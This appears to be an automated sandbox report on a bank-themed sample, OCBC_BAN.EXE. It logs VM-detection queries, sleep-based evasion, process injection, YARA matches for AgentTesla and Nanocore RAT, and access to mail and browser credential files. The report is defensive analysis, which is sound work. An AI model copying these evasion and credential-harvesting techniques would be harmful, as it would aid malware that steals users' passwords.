Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 6436	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 5300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5040	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6868	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6868	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 6860	Thread sleep count: 4710 > 30
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe TID: 1800	Thread sleep count: 3967 > 30
Source: C:\Users\user\Desktop\OCBC_BAN.EXE TID: 6296	Thread sleep time: -23980767295822402s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Window / User API: threadDelayed 4710
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Window / User API: threadDelayed 3967
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Window / User API: threadDelayed 3726
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Window / User API: threadDelayed 5720
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Window / User API: foregroundWindowGot 371

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Thread delayed: delay time: 922337203685477

Source: Pubrtkzyqpdcef1.exe, 00000009.00000002.633430133.0000000001506000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: OCBC_BAN.EXE, 0000000C.00000002.633203616.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: OCBC_BAN.EXE, 00000000.00000002.533832064.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe

Code function: 9_2_06935730 LdrInitializeThunk,

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Memory written: C:\Users\user\Desktop\OCBC_BAN.EXE base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe "C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe"
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Process created: C:\Users\user\Desktop\OCBC_BAN.EXE C:\Users\user\Desktop\OCBC_BAN.EXE
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 10

Source: OCBC_BAN.EXE, 0000000C.00000002.637688473.00000000061DE000.00000004.00000010.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.637734244.000000000655E000.00000004.00000010.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634401808.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: OCBC_BAN.EXE, 0000000C.00000002.634375880.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634556764.0000000002C25000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.635333321.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\|$
Source: OCBC_BAN.EXE, 0000000C.00000002.634401808.0000000002B0B000.00000004.00000800.00020000.00000000.sdmp, OCBC_BAN.EXE, 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: OCBC_BAN.EXE, 0000000C.00000002.635333321.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerHa\|l

Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Users\user\Desktop\OCBC_BAN.EXE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Users\user\Desktop\OCBC_BAN.EXE VolumeInformation
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\OCBC_BAN.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\OCBC_BAN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.466270917.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.632461806.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.462652730.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.465157783.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536198846.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe, type: DROPPED
Source: Yara match	File source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR

Yara detected Nanocore RAT

Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3ce2ed0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1b0ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a2454d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba4629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.5ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.OCBC_BAN.EXE.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3cbaeb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.OCBC_BAN.EXE.3a1ff24.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OCBC_BAN.EXE.3d32ef0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000000.529083505.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.528619863.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536986787.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.632460543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.536754919.0000000003B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.530203909.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.529485631.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.637443502.0000000005BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.634125334.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.635571105.00000000039D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.537196889.0000000003D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OCBC_BAN.EXE PID: 3524, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Pubrtkzyqpdcef1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: Yara match	File source: 00000009.00000002.634035995.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pubrtkzyqpdcef1.exe PID: 5604, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a7b3e38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a803e58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Pubrtkzyqpdcef1.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a7b3e38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OCBC_BAN.EXE.a803e58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Pubrtkzyqpdcef1.exe.e30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.465813754.0000000000E32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.497174960.000000000A803000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.497125933.000000000A7AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
